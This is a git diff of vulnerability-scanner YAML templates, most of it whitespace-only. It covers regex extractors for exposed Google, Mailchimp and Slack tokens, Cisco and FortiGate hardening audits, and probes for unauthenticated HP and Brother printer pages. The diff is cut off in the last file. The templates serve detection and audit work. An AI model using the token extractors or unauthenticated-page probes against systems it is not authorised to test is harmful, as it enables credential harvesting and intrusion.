+id: google-api-key
 
-info:
-  name: Google API Key
-  author: Swissky
-  severity: info
-  tags: exposure,token,google
+info:
+  name: Google API Key
+  author: Swissky
+  severity: info
+  tags: exposure,token,google
 
-requests:
-  - method: GET
-    path:
-      - "{{BaseURL}}"
-      - "{{BaseURL}}/hopfully404"
-
-    extractors:
-      - type: regex
-        part: body
-        regex:
-          - "AIza[0-9A-Za-z\\-_]{35}"
+requests:
+  - method: GET
+    path:
+      - "{{BaseURL}}"
+      - "{{BaseURL}}/hopfully404"
+
+    extractors:
+      - type: regex
+        part: body
+        regex:
+          - "AIza[0-9A-Za-z\\-_]{35}"
diff --git a/exposures/tokens/mailchimp/mailchimp-api-key.yaml b/exposures/tokens/mailchimp/mailchimp-api-key.yaml
index c55e7bcbac..3ca9f1ae24 100644
--- a/exposures/tokens/mailchimp/mailchimp-api-key.yaml
+++ b/exposures/tokens/mailchimp/mailchimp-api-key.yaml
@@ -1,18 +1,18 @@
-id: mailchimp-access-key-value
+id: mailchimp-access-key-value
 
-info:
-  name: Mailchimp API Value
-  author: puzzlepeaches
-  severity: info
-  tags: exposure,token,mailchimp
+info:
+  name: Mailchimp API Value
+  author: puzzlepeaches
+  severity: info
+  tags: exposure,token,mailchimp
 
-requests:
-  - method: GET
-    path:
-      - "{{BaseURL}}"
-
-    extractors:
-      - type: regex
-        part: body
-        regex:
-          - "[0-9a-f]{32}-us[0-9]{1,2}"
+requests:
+  - method: GET
+    path:
+      - "{{BaseURL}}"
+
+    extractors:
+      - type: regex
+        part: body
+        regex:
+          - "[0-9a-f]{32}-us[0-9]{1,2}"
diff --git a/exposures/tokens/slack/slack-bot-token.yaml b/exposures/tokens/slack/slack-bot-token.yaml
index 0330386356..e520d806c8 100644
--- a/exposures/tokens/slack/slack-bot-token.yaml
+++ b/exposures/tokens/slack/slack-bot-token.yaml
@@ -1,18 +1,18 @@
-id: slack-bot-token
+id: slack-bot-token
 
-info:
-  name: Slack access token
-  author: nadino
-  severity: info
-  tags: exposure,token,slack
+info:
+  name: Slack access token
+  author: nadino
+  severity: info
+  tags: exposure,token,slack
 
-requests:
-  - method: GET
-    path:
-      - "{{BaseURL}}"
-
-    extractors:
-      - type: regex
-        part: body
-        regex:
+requests:
+  - method: GET
+    path:
+      - "{{BaseURL}}"
+
+    extractors:
+      - type: regex
+        part: body
+        regex:
           - "xoxb-[0-9A-Za-z\\-]{51}"
\ No newline at end of file
diff --git a/file/audit/cisco/configure-aaa-service.yaml b/file/audit/cisco/configure-aaa-service.yaml
index 2b1d96e41a..c7133a4859 100644
--- a/file/audit/cisco/configure-aaa-service.yaml
+++ b/file/audit/cisco/configure-aaa-service.yaml
@@ -1,26 +1,26 @@
-id: configure-aaa-service
-
-info:
-  name: Configure AAA service
-  author: pussycat0x
-  severity: info
-  description: |
-      Authentication, authorization and accounting (AAA) services provide an authoritative source for managing and monitoring access for devices.
-  reference:
-    - https://www.cisco.com/c/en/us/td/docs/ios-xml/ios/security/a1/sec-a1-cr-book/sec-cr-a2.html#GUID-E05C2E00-C01E-4053-9D12-EC37C7E8EEC5
-  tags: cisco,config-audit,cisco-switch,router
-
-file:
-  - extensions:
-      - conf
-
-    matchers-condition: and
-    matchers:
-      - type: word
-        words:
-          - "aaa new-model"
-        negative: true
-
-      - type: word
-        words:
+id: configure-aaa-service
+
+info:
+  name: Configure AAA service
+  author: pussycat0x
+  severity: info
+  description: |
+      Authentication, authorization and accounting (AAA) services provide an authoritative source for managing and monitoring access for devices.
+  reference:
+    - https://www.cisco.com/c/en/us/td/docs/ios-xml/ios/security/a1/sec-a1-cr-book/sec-cr-a2.html#GUID-E05C2E00-C01E-4053-9D12-EC37C7E8EEC5
+  tags: cisco,config-audit,cisco-switch,router
+
+file:
+  - extensions:
+      - conf
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        words:
+          - "aaa new-model"
+        negative: true
+
+      - type: word
+        words:
           - "configure terminal"
\ No newline at end of file
diff --git a/file/audit/cisco/configure-service-timestamps-debug.yaml b/file/audit/cisco/configure-service-timestamps-debug.yaml
index 1b04235e7c..7fa403065f 100644
--- a/file/audit/cisco/configure-service-timestamps-debug.yaml
+++ b/file/audit/cisco/configure-service-timestamps-debug.yaml
@@ -1,26 +1,26 @@
-id: configure-service-timestamps-debug
-
-info:
-  name: Configure Service Timestamps for Debug
-  author: pussycat0x
-  severity: info
-  description: |
-      To configure the system to time-stamp debugging or logging messages, use one of the service timestamps global configuration commands. Use the no form of this command to disable this service.
-  reference:
-    - https://www.cisco.com/E-Learning/bulk/public/tac/cim/cib/using_cisco_ios_software/cmdrefs/service_timestamps.htm
-  tags: cisco,config-audit,cisco-switch,router
-
-file:
-  - extensions:
-      - conf
-
-    matchers-condition: and
-    matchers:
-      - type: word
-        words:
-          - "service timestamps debug datetime msec show-timezone localtime"
-        negative: true
-
-      - type: word
-        words:
+id: configure-service-timestamps-debug
+
+info:
+  name: Configure Service Timestamps for Debug
+  author: pussycat0x
+  severity: info
+  description: |
+      To configure the system to time-stamp debugging or logging messages, use one of the service timestamps global configuration commands. Use the no form of this command to disable this service.
+  reference:
+    - https://www.cisco.com/E-Learning/bulk/public/tac/cim/cib/using_cisco_ios_software/cmdrefs/service_timestamps.htm
+  tags: cisco,config-audit,cisco-switch,router
+
+file:
+  - extensions:
+      - conf
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        words:
+          - "service timestamps debug datetime msec show-timezone localtime"
+        negative: true
+
+      - type: word
+        words:
           - "configure terminal"
\ No newline at end of file
diff --git a/file/audit/cisco/configure-service-timestamps-logmessages.yaml b/file/audit/cisco/configure-service-timestamps-logmessages.yaml
index 61c12cdcf4..227fb91dc4 100644
--- a/file/audit/cisco/configure-service-timestamps-logmessages.yaml
+++ b/file/audit/cisco/configure-service-timestamps-logmessages.yaml
@@ -1,26 +1,26 @@
-id: configure-service-log-messages
-
-info:
-  name: Configure Service Timestamps Log Messages
-  author: pussycat0x
-  severity: info
-  description: |
-      To configure the system to time-stamp debugging or logging messages, use one of the service timestamps global configuration commands. Use the no form of this command to disable this service.
-  reference:
-    - https://www.cisco.com/E-Learning/bulk/public/tac/cim/cib/using_cisco_ios_software/cmdrefs/service_timestamps.htm
-  tags: cisco,config-audit,cisco-switch,router
-
-file:
-  - extensions:
-      - conf
-
-    matchers-condition: and
-    matchers:
-      - type: word
-        words:
-          - "service timestamps log datetime msec show-timezone localtime"
-        negative: true
-
-      - type: word
-        words:
+id: configure-service-log-messages
+
+info:
+  name: Configure Service Timestamps Log Messages
+  author: pussycat0x
+  severity: info
+  description: |
+      To configure the system to time-stamp debugging or logging messages, use one of the service timestamps global configuration commands. Use the no form of this command to disable this service.
+  reference:
+    - https://www.cisco.com/E-Learning/bulk/public/tac/cim/cib/using_cisco_ios_software/cmdrefs/service_timestamps.htm
+  tags: cisco,config-audit,cisco-switch,router
+
+file:
+  - extensions:
+      - conf
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        words:
+          - "service timestamps log datetime msec show-timezone localtime"
+        negative: true
+
+      - type: word
+        words:
           - "configure terminal"
\ No newline at end of file
diff --git a/file/audit/cisco/disable-ip-source-route.yaml b/file/audit/cisco/disable-ip-source-route.yaml
index e0937bccfd..e41bba987f 100644
--- a/file/audit/cisco/disable-ip-source-route.yaml
+++ b/file/audit/cisco/disable-ip-source-route.yaml
@@ -1,26 +1,26 @@
-id: disable-ip-source-route
-
-info:
-  name: Disable IP source-route
-  author: pussycat0x
-  severity: info
-  description: |
-      Organizations should plan and implement network policies to ensure unnecessary services are explicitly disabled. The 'ip source-route' feature has been used in several attacks and should be disabled.
-  reference:
-    - https://www.cisco.com/c/en/us/td/docs/ios-xml/ios/ipaddr/command/ipaddr-cr-book/ipaddr-i4.html#GUID-C7F971DD-358F-4B43-9F3E-244F5D4A3A93
-  tags: cisco,config-audit,cisco-switch,router
-
-file:
-  - extensions:
-      - conf
-
-    matchers-condition: and
-    matchers:
-      - type: word
-        words:
-          - "no ip source-route"
-        negative: true
-
-      - type: word
-        words:
+id: disable-ip-source-route
+
+info:
+  name: Disable IP source-route
+  author: pussycat0x
+  severity: info
+  description: |
+      Organizations should plan and implement network policies to ensure unnecessary services are explicitly disabled. The 'ip source-route' feature has been used in several attacks and should be disabled.
+  reference:
+    - https://www.cisco.com/c/en/us/td/docs/ios-xml/ios/ipaddr/command/ipaddr-cr-book/ipaddr-i4.html#GUID-C7F971DD-358F-4B43-9F3E-244F5D4A3A93
+  tags: cisco,config-audit,cisco-switch,router
+
+file:
+  - extensions:
+      - conf
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        words:
+          - "no ip source-route"
+        negative: true
+
+      - type: word
+        words:
           - "configure terminal"
\ No newline at end of file
diff --git a/file/audit/cisco/disable-pad-service.yaml b/file/audit/cisco/disable-pad-service.yaml
index a3b355aed4..898ed8d43e 100644
--- a/file/audit/cisco/disable-pad-service.yaml
+++ b/file/audit/cisco/disable-pad-service.yaml
@@ -1,26 +1,26 @@
-id: disable-pad-service
-
-info:
-  name: Disable PAD service
-  author: pussycat0x
-  severity: info
-  description: |
-      To reduce the risk of unauthorized access, organizations should implement a security policy restricting unnecessary services such as the 'PAD' service.
-  reference:
-    - http://www.cisco.com/en/US/docs/ios-xml/ios/wan/command/wan-s1.html#GUID-C5497B77-3FD4-4D2F-AB08-1317D5F5473B
-  tags: cisco,config-audit,cisco-switch,router
-
-file:
-  - extensions:
-      - conf
-
-    matchers-condition: and
-    matchers:
-      - type: word
-        words:
-          - "no service pad"
-        negative: true
-
-      - type: word
-        words:
+id: disable-pad-service
+
+info:
+  name: Disable PAD service
+  author: pussycat0x
+  severity: info
+  description: |
+      To reduce the risk of unauthorized access, organizations should implement a security policy restricting unnecessary services such as the 'PAD' service.
+  reference:
+    - http://www.cisco.com/en/US/docs/ios-xml/ios/wan/command/wan-s1.html#GUID-C5497B77-3FD4-4D2F-AB08-1317D5F5473B
+  tags: cisco,config-audit,cisco-switch,router
+
+file:
+  - extensions:
+      - conf
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        words:
+          - "no service pad"
+        negative: true
+
+      - type: word
+        words:
           - "configure terminal"
\ No newline at end of file
diff --git a/file/audit/cisco/enable-secret-for-password-user-and-.yaml b/file/audit/cisco/enable-secret-for-password-user-and-.yaml
index 1ef7e4512f..a309f0164b 100644
--- a/file/audit/cisco/enable-secret-for-password-user-and-.yaml
+++ b/file/audit/cisco/enable-secret-for-password-user-and-.yaml
@@ -1,26 +1,26 @@
-id: enable-secret-for-user-and-password
-
-info:
-  name: Enable and User Password with Secret
-  author: pussycat0x
-  severity: info
-  description: |
-      To configure the system to time-stamp debugging or logging messages, use one of the service timestamps global configuration commands. Use the no form of this command to disable this service.
-  reference:
-    - https://www.cisco.com/E-Learning/bulk/public/tac/cim/cib/using_cisco_ios_software/cmdrefs/service_timestamps.htm
-  tags: cisco,config-audit,cisco-switch,router
-
-file:
-  - extensions:
-      - conf
-
-    matchers-condition: and
-    matchers:
-      - type: word
-        words:
-          - "enable secret"
-        negative: true
-
-      - type: word
-        words:
+id: enable-secret-for-user-and-password
+
+info:
+  name: Enable and User Password with Secret
+  author: pussycat0x
+  severity: info
+  description: |
+      To configure the system to time-stamp debugging or logging messages, use one of the service timestamps global configuration commands. Use the no form of this command to disable this service.
+  reference:
+    - https://www.cisco.com/E-Learning/bulk/public/tac/cim/cib/using_cisco_ios_software/cmdrefs/service_timestamps.htm
+  tags: cisco,config-audit,cisco-switch,router
+
+file:
+  - extensions:
+      - conf
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        words:
+          - "enable secret"
+        negative: true
+
+      - type: word
+        words:
           - "configure terminal"
\ No newline at end of file
diff --git a/file/audit/cisco/logging-enable.yaml b/file/audit/cisco/logging-enable.yaml
index bcbf9c75d3..95f0ed0c66 100644
--- a/file/audit/cisco/logging-enable.yaml
+++ b/file/audit/cisco/logging-enable.yaml
@@ -1,26 +1,26 @@
-id: logging-enable
-
-info:
-  name: Logging enable
-  author: pussycat0x
-  severity: info
-  description: |
-      Enabling the Cisco IOS 'logging enable' command enforces the monitoring of technology risks for the organizations' network devices.
-  reference:
-    - https://www.cisco.com/c/en/us/td/docs/ios-xml/ios/config-mgmt/configuration/xe-16-6/config-mgmt-xe-16-6-book/cm-config-logger.pdf
-  tags: cisco,config-audit,cisco-switch
-
-file:
-  - extensions:
-      - conf
-
-    matchers-condition: and
-    matchers:
-      - type: word
-        words:
-          - "logging enable"
-        negative: true
-
-      - type: word
-        words:
+id: logging-enable
+
+info:
+  name: Logging enable
+  author: pussycat0x
+  severity: info
+  description: |
+      Enabling the Cisco IOS 'logging enable' command enforces the monitoring of technology risks for the organizations' network devices.
+  reference:
+    - https://www.cisco.com/c/en/us/td/docs/ios-xml/ios/config-mgmt/configuration/xe-16-6/config-mgmt-xe-16-6-book/cm-config-logger.pdf
+  tags: cisco,config-audit,cisco-switch
+
+file:
+  - extensions:
+      - conf
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        words:
+          - "logging enable"
+        negative: true
+
+      - type: word
+        words:
           - "configure terminal"
\ No newline at end of file
diff --git a/file/audit/fortigate/auto-usb-install.yaml b/file/audit/fortigate/auto-usb-install.yaml
index 01c105ea73..0f971fe501 100644
--- a/file/audit/fortigate/auto-usb-install.yaml
+++ b/file/audit/fortigate/auto-usb-install.yaml
@@ -1,28 +1,28 @@
-id: auto-usb-install
-
-info:
-  name: Auto USB Installation Enabled
-  author: pussycat0x
-  severity: info
-  description: If USB installation is not disabled, an attacker with physical access to a FortiGate could load a new configuration or firmware using the USB port.
-  reference: https://docs.fortinet.com/document/fortigate/6.2.0/hardening-your-fortigate/582009/system-administrator-best-practices
-  tags: fortigate,config,audit,firewall
-
-file:
-  - extensions:
-      - conf
-
-    matchers-condition: and
-    matchers:
-      - type: word
-        words:
-          - "set auto-install-config disable"
-          - "set auto-install-image disable"
-        negative: true
-
-      - type: word
-        words:
-          - "config system"
-          - "config router"
-          - "config firewall"
-        condition: or
+id: auto-usb-install
+
+info:
+  name: Auto USB Installation Enabled
+  author: pussycat0x
+  severity: info
+  description: If USB installation is not disabled, an attacker with physical access to a FortiGate could load a new configuration or firmware using the USB port.
+  reference: https://docs.fortinet.com/document/fortigate/6.2.0/hardening-your-fortigate/582009/system-administrator-best-practices
+  tags: fortigate,config,audit,firewall
+
+file:
+  - extensions:
+      - conf
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        words:
+          - "set auto-install-config disable"
+          - "set auto-install-image disable"
+        negative: true
+
+      - type: word
+        words:
+          - "config system"
+          - "config router"
+          - "config firewall"
+        condition: or
diff --git a/file/audit/fortigate/heuristic-scan.yaml b/file/audit/fortigate/heuristic-scan.yaml
index cab986f036..2637a1d0ab 100644
--- a/file/audit/fortigate/heuristic-scan.yaml
+++ b/file/audit/fortigate/heuristic-scan.yaml
@@ -1,28 +1,28 @@
-id: heuristic-scan
-
-info:
-  name: Heuristic scanning is not configured
-  author: pussycat0x
-  severity: info
-  description: Heuristic scanning is a technique used to identify previously unknown viruses. A value of block enables heuristic AV scanning of binary files and blocks any detected. A replacement message will be forwarded to the recipient. Blocked files are quarantined if quarantine is enabled.
-  reference: https://docs.fortinet.com/document/fortigate/6.2.0/hardening-your-fortigate/582009/system-administrator-best-practices
-  tags: fortigate,config,audit,firewall
-
-file:
-  - extensions:
-      - conf
-
-    matchers-condition: and
-    matchers:
-      - type: word
-        words:
-          - "config antivirus heuristic"
-          - "set mode block"
-        negative: true
-
-      - type: word
-        words:
-          - "config system"
-          - "config router"
-          - "config firewall"
+id: heuristic-scan
+
+info:
+  name: Heuristic scanning is not configured
+  author: pussycat0x
+  severity: info
+  description: Heuristic scanning is a technique used to identify previously unknown viruses. A value of block enables heuristic AV scanning of binary files and blocks any detected. A replacement message will be forwarded to the recipient. Blocked files are quarantined if quarantine is enabled.
+  reference: https://docs.fortinet.com/document/fortigate/6.2.0/hardening-your-fortigate/582009/system-administrator-best-practices
+  tags: fortigate,config,audit,firewall
+
+file:
+  - extensions:
+      - conf
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        words:
+          - "config antivirus heuristic"
+          - "set mode block"
+        negative: true
+
+      - type: word
+        words:
+          - "config system"
+          - "config router"
+          - "config firewall"
         condition: or
\ No newline at end of file
diff --git a/file/audit/fortigate/inactivity-timeout.yaml b/file/audit/fortigate/inactivity-timeout.yaml
index 9c032f8874..8827541e1f 100644
--- a/file/audit/fortigate/inactivity-timeout.yaml
+++ b/file/audit/fortigate/inactivity-timeout.yaml
@@ -1,27 +1,27 @@
-id: inactivity-timeout
-
-info:
-  name: Inactivity Timeout Not Implemented
-  author: pussycat0x
-  severity: info
-  description: Lack of Inactivity Timeout gives the unauthorized user to act within that threshold if the administrator is away from the computer.
-  reference: https://docs.fortinet.com/document/fortigate/6.2.0/hardening-your-fortigate/582009/system-administrator-best-practices
-  tags: fortigate,config,audit,firewall
-
-file:
-  - extensions:
-      - conf
-
-    matchers-condition: and
-    matchers:
-      - type: word
-        words:
-          - "set admin-console-timeout"
-        negative: true
-
-      - type: word
-        words:
-          - "config system"
-          - "config router"
-          - "config firewall"
+id: inactivity-timeout
+
+info:
+  name: Inactivity Timeout Not Implemented
+  author: pussycat0x
+  severity: info
+  description: Lack of Inactivity Timeout gives the unauthorized user to act within that threshold if the administrator is away from the computer.
+  reference: https://docs.fortinet.com/document/fortigate/6.2.0/hardening-your-fortigate/582009/system-administrator-best-practices
+  tags: fortigate,config,audit,firewall
+
+file:
+  - extensions:
+      - conf
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        words:
+          - "set admin-console-timeout"
+        negative: true
+
+      - type: word
+        words:
+          - "config system"
+          - "config router"
+          - "config firewall"
         condition: or
\ No newline at end of file
diff --git a/file/audit/fortigate/maintainer-account.yaml b/file/audit/fortigate/maintainer-account.yaml
index bb9068401a..be3e69a417 100644
--- a/file/audit/fortigate/maintainer-account.yaml
+++ b/file/audit/fortigate/maintainer-account.yaml
@@ -1,27 +1,27 @@
-id: maintainer-account
-
-info:
-  name: Maintainer Account Not Implemented
-  author: pussycat0x
-  severity: info
-  description: If the FortiGate is compromised and Password is not recoverable. A maintainer account can be used by an administrator with physical access to log into CLI..
-  reference: https://docs.fortinet.com/document/fortigate/6.4.0/hardening-your-fortigate/612504/hardening-your-fortigate
-  tags: fortigate,config,audit,firewall
-
-file:
-  - extensions:
-      - conf
-
-    matchers-condition: and
-    matchers:
-      - type: word
-        words:
-          - "set admin-maintainer"
-        negative: true
-
-      - type: word
-        words:
-          - "config system"
-          - "config router"
-          - "config firewall"
+id: maintainer-account
+
+info:
+  name: Maintainer Account Not Implemented
+  author: pussycat0x
+  severity: info
+  description: If the FortiGate is compromised and Password is not recoverable. A maintainer account can be used by an administrator with physical access to log into CLI..
+  reference: https://docs.fortinet.com/document/fortigate/6.4.0/hardening-your-fortigate/612504/hardening-your-fortigate
+  tags: fortigate,config,audit,firewall
+
+file:
+  - extensions:
+      - conf
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        words:
+          - "set admin-maintainer"
+        negative: true
+
+      - type: word
+        words:
+          - "config system"
+          - "config router"
+          - "config firewall"
         condition: or
\ No newline at end of file
diff --git a/file/audit/fortigate/password-policy.yaml b/file/audit/fortigate/password-policy.yaml
index 44910a95d1..30c3ff510c 100644
--- a/file/audit/fortigate/password-policy.yaml
+++ b/file/audit/fortigate/password-policy.yaml
@@ -1,27 +1,27 @@
-id: password-policy
-
-info:
-  name: Password Policy not Set
-  author: pussycat0x
-  severity: info
-  description: The Administrative Password Policy is not set. Use the password policy feature to ensure all administrators use secure passwords that meet your organization's requirements.
-  reference: https://docs.fortinet.com/document/fortigate/6.2.0/hardening-your-fortigate/582009/system-administrator-best-practices
-  tags: fortigate,config,audit,firewall
-
-file:
-  - extensions:
-      - conf
-
-    matchers-condition: and
-    matchers:
-      - type: word
-        words:
-          - "config system password-policy"
-        negative: true
-
-      - type: word
-        words:
-          - "config system"
-          - "config router"
-          - "config firewall"
+id: password-policy
+
+info:
+  name: Password Policy not Set
+  author: pussycat0x
+  severity: info
+  description: The Administrative Password Policy is not set. Use the password policy feature to ensure all administrators use secure passwords that meet your organization's requirements.
+  reference: https://docs.fortinet.com/document/fortigate/6.2.0/hardening-your-fortigate/582009/system-administrator-best-practices
+  tags: fortigate,config,audit,firewall
+
+file:
+  - extensions:
+      - conf
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        words:
+          - "config system password-policy"
+        negative: true
+
+      - type: word
+        words:
+          - "config system"
+          - "config router"
+          - "config firewall"
         condition: or
\ No newline at end of file
diff --git a/file/audit/fortigate/remote-auth-timeout.yaml b/file/audit/fortigate/remote-auth-timeout.yaml
index 43870c984d..b2538b9722 100644
--- a/file/audit/fortigate/remote-auth-timeout.yaml
+++ b/file/audit/fortigate/remote-auth-timeout.yaml
@@ -1,27 +1,27 @@
-id: remote-auth-timeout
-
-info:
-  name: Remote Authentication timeout not set
-  author: pussycat0x
-  severity: info
-  description: Lack of Inactivity Timeout gives the unauthorized user to act within that threshold if the administrator is away from the computer.
-  reference: https://docs.fortinet.com/document/fortigate/6.4.0/hardening-your-fortigate/612504/hardening-your-fortigate
-  tags: fortigate,config,audit,firewall
-
-file:
-  - extensions:
-      - conf
-
-    matchers-condition: and
-    matchers:
-      - type: word
-        words:
-          - "set remoteauthtimeout"
-        negative: true
-
-      - type: word
-        words:
-          - "config system"
-          - "config router"
-          - "config firewall"
+id: remote-auth-timeout
+
+info:
+  name: Remote Authentication timeout not set
+  author: pussycat0x
+  severity: info
+  description: Lack of Inactivity Timeout gives the unauthorized user to act within that threshold if the administrator is away from the computer.
+  reference: https://docs.fortinet.com/document/fortigate/6.4.0/hardening-your-fortigate/612504/hardening-your-fortigate
+  tags: fortigate,config,audit,firewall
+
+file:
+  - extensions:
+      - conf
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        words:
+          - "set remoteauthtimeout"
+        negative: true
+
+      - type: word
+        words:
+          - "config system"
+          - "config router"
+          - "config firewall"
         condition: or
\ No newline at end of file
diff --git a/file/audit/fortigate/scp-admin.yaml b/file/audit/fortigate/scp-admin.yaml
index 4f776836b6..06f9f3f558 100644
--- a/file/audit/fortigate/scp-admin.yaml
+++ b/file/audit/fortigate/scp-admin.yaml
@@ -1,27 +1,27 @@
-id: scp-admin
-
-info:
-  name: Admin-SCP Disabled
-  author: pussycat0x
-  severity: info
-  description: Disable SCP by default. Enabling SCP allows downloading the configuration file from the FortiGate as an alternative method of backing up the configuration file.
-  reference: https://docs.fortinet.com/document/fortigate/6.4.0/hardening-your-fortigate/612504/hardening-your-fortigate
-  tags: fortigate,config,audit,firewall
-
-file:
-  - extensions:
-      - conf
-
-    matchers-condition: and
-    matchers:
-      - type: word
-        words:
-          - "set admin-scp enable"
-        negative: true
-
-      - type: word
-        words:
-          - "config system"
-          - "config router"
-          - "config firewall"
+id: scp-admin
+
+info:
+  name: Admin-SCP Disabled
+  author: pussycat0x
+  severity: info
+  description: Disable SCP by default. Enabling SCP allows downloading the configuration file from the FortiGate as an alternative method of backing up the configuration file.
+  reference: https://docs.fortinet.com/document/fortigate/6.4.0/hardening-your-fortigate/612504/hardening-your-fortigate
+  tags: fortigate,config,audit,firewall
+
+file:
+  - extensions:
+      - conf
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        words:
+          - "set admin-scp enable"
+        negative: true
+
+      - type: word
+        words:
+          - "config system"
+          - "config router"
+          - "config firewall"
         condition: or
\ No newline at end of file
diff --git a/file/audit/fortigate/strong-ciphers.yaml b/file/audit/fortigate/strong-ciphers.yaml
index 170d6183a5..d2443279c6 100644
--- a/file/audit/fortigate/strong-ciphers.yaml
+++ b/file/audit/fortigate/strong-ciphers.yaml
@@ -1,27 +1,27 @@
-id: strong-ciphers
-
-info:
-  name: HTTPS/SSH Strong Ciphers Not Enabled
-  author: pussycat0x
-  severity: info
-  description: Weak Ciphers can be broken by an attacker in a local network and can perform attacks like Blowfish.
-  reference: https://docs.fortinet.com/document/fortigate/6.2.0/hardening-your-fortigate/582009/system-administrator-best-practices
-  tags: fortigate,config,audit,firewall
-
-file:
-  - extensions:
-      - conf
-
-    matchers-condition: and
-    matchers:
-      - type: word
-        words:
-          - "set strong-crypto enable"
-        negative: true
-
-      - type: word
-        words:
-          - "config system"
-          - "config router"
-          - "config firewall"
+id: strong-ciphers
+
+info:
+  name: HTTPS/SSH Strong Ciphers Not Enabled
+  author: pussycat0x
+  severity: info
+  description: Weak Ciphers can be broken by an attacker in a local network and can perform attacks like Blowfish.
+  reference: https://docs.fortinet.com/document/fortigate/6.2.0/hardening-your-fortigate/582009/system-administrator-best-practices
+  tags: fortigate,config,audit,firewall
+
+file:
+  - extensions:
+      - conf
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        words:
+          - "set strong-crypto enable"
+        negative: true
+
+      - type: word
+        words:
+          - "config system"
+          - "config router"
+          - "config firewall"
         condition: or
\ No newline at end of file
diff --git a/iot/brother-printer-detect.yaml b/iot/brother-printer-detect.yaml
index 86589db024..ecf0f021fc 100644
--- a/iot/brother-printer-detect.yaml
+++ b/iot/brother-printer-detect.yaml
@@ -1,23 +1,23 @@
-id: brother-printer-detect
+id: brother-printer-detect
 
-info:
-  name: Brother Printer
-  author: pussycat0x
-  severity: low
-  reference: https://www.exploit-db.com/ghdb/6889
-  tags: iot,printer,tech
+info:
+  name: Brother Printer
+  author: pussycat0x
+  severity: low
+  reference: https://www.exploit-db.com/ghdb/6889
+  tags: iot,printer,tech
 
-requests:
-  - method: GET
-    path:
-      - "{{BaseURL}}/general/status.html"
-
-    matchers-condition: and
-    matchers:
-      - type: word
-        words:
-          - "Brother Industries"
-
-      - type: status
-        status:
+requests:
+  - method: GET
+    path:
+      - "{{BaseURL}}/general/status.html"
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        words:
+          - "Brother Industries"
+
+      - type: status
+        status:
           - 200
\ No newline at end of file
diff --git a/iot/brother-unauthorized-access.yaml b/iot/brother-unauthorized-access.yaml
index f3e5d8283c..f0e73f3ef8 100644
--- a/iot/brother-unauthorized-access.yaml
+++ b/iot/brother-unauthorized-access.yaml
@@ -1,25 +1,25 @@
-id: brother-unauthorized-access
+id: brother-unauthorized-access
 
-info:
-  name: Brother Printer
-  author: pussycat0x
-  severity: medium
-  reference: https://www.exploit-db.com/ghdb/6889
-  tags: iot,printer,unauth
+info:
+  name: Brother Printer
+  author: pussycat0x
+  severity: medium
+  reference: https://www.exploit-db.com/ghdb/6889
+  tags: iot,printer,unauth
 
-requests:
-  - method: GET
-    path:
-      - "{{BaseURL}}/net/net/net.html"
-
-    matchers-condition: and
-    matchers:
-      - type: word
-        words:
-          - "Brother Industries"
-          - "Network Status"
-        condition: and
-
-      - type: status
-        status:
-          - 200
+requests:
+  - method: GET
+    path:
+      - "{{BaseURL}}/net/net/net.html"
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        words:
+          - "Brother Industries"
+          - "Network Status"
+        condition: and
+
+      - type: status
+        status:
+          - 200
diff --git a/iot/hp-device-info-detect.yaml b/iot/hp-device-info-detect.yaml
index b00b5b26b2..8a876098e1 100644
--- a/iot/hp-device-info-detect.yaml
+++ b/iot/hp-device-info-detect.yaml
@@ -1,24 +1,24 @@
-id: hp-device-info-detect
+id: hp-device-info-detect
 
-info:
-  name: HP LaserJet
-  author: pussycat0x
-  severity: low
-  reference: https://www.exploit-db.com/ghdb/6905
-  tags: iot,hp
+info:
+  name: HP LaserJet
+  author: pussycat0x
+  severity: low
+  reference: https://www.exploit-db.com/ghdb/6905
+  tags: iot,hp
 
-requests:
-  - method: GET
-    path:
-      - "{{BaseURL}}/hp/device/DeviceInformation/View"
-    matchers-condition: and
-    matchers:
-      - type: word
-        words:
-          - "Device Information"
-          - "hp"
-        condition: and
-
-      - type: status
-        status:
+requests:
+  - method: GET
+    path:
+      - "{{BaseURL}}/hp/device/DeviceInformation/View"
+    matchers-condition: and
+    matchers:
+      - type: word
+        words:
+          - "Device Information"
+          - "hp"
+        condition: and
+
+      - type: status
+        status:
           - 200
\ No newline at end of file
diff --git a/misconfiguration/hp/unauthorized-hp-printer.yaml b/misconfiguration/hp/unauthorized-hp-printer.yaml
index 9f69be01e2..adf7d2e653 100644
--- a/misconfiguration/hp/unauthorized-hp-printer.yaml
+++ b/misconfiguration/hp/unauthorized-hp-printer.yaml
@@ -1,24 +1,24 @@
-id: unauthorized-hp-printer
-
-info:
-  name: Unauthorized HP Printer
-  author: pussycat0x
-  severity: high
-  tags: hp,iot,unauth
-
-requests:
-  - method: GET
-    path:
-      - "{{BaseURL}}/SSI/Auth/ip_snmp.htm"
-
-    matchers-condition: and
-    matchers:
-      - type: word
-        words:
-          - "HP"
-          - "<h1>SNMP</h1>"
-        condition: and
-
-      - type: status
-        status:
-          - 200
+id: unauthorized-hp-printer
+
+info:
+  name: Unauthorized HP Printer
+  author: pussycat0x
+  severity: high
+  tags: hp,iot,unauth
+
+requests:
+  - method: GET
+    path:
+      - "{{BaseURL}}/SSI/Auth/ip_snmp.htm"
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        words:
+          - "HP"
+          - "<h1>SNMP</h1>"
+        condition: and
+
+      - type: status
+        status:
+          - 200
diff --git a/misconfiguration/hp/unauthorized-printer-hp.yaml b/misconfiguration/hp/unauthorized-printer-hp.yaml
index 2c485f2e3e..a04c2f3be0 100644
--- a/misconfiguration/hp/unauthorized-printer-hp.yaml
+++ b/misconfiguration/hp/unauthorized-printer-hp.yaml
@@ -1,25 +1,25 @@
-id: unauthorized-printer-hp
-
-info:
-  name: Unauthorized HP office pro printer
-  author: pussycat0x,r3naissance
-  severity: high
-  metadata:
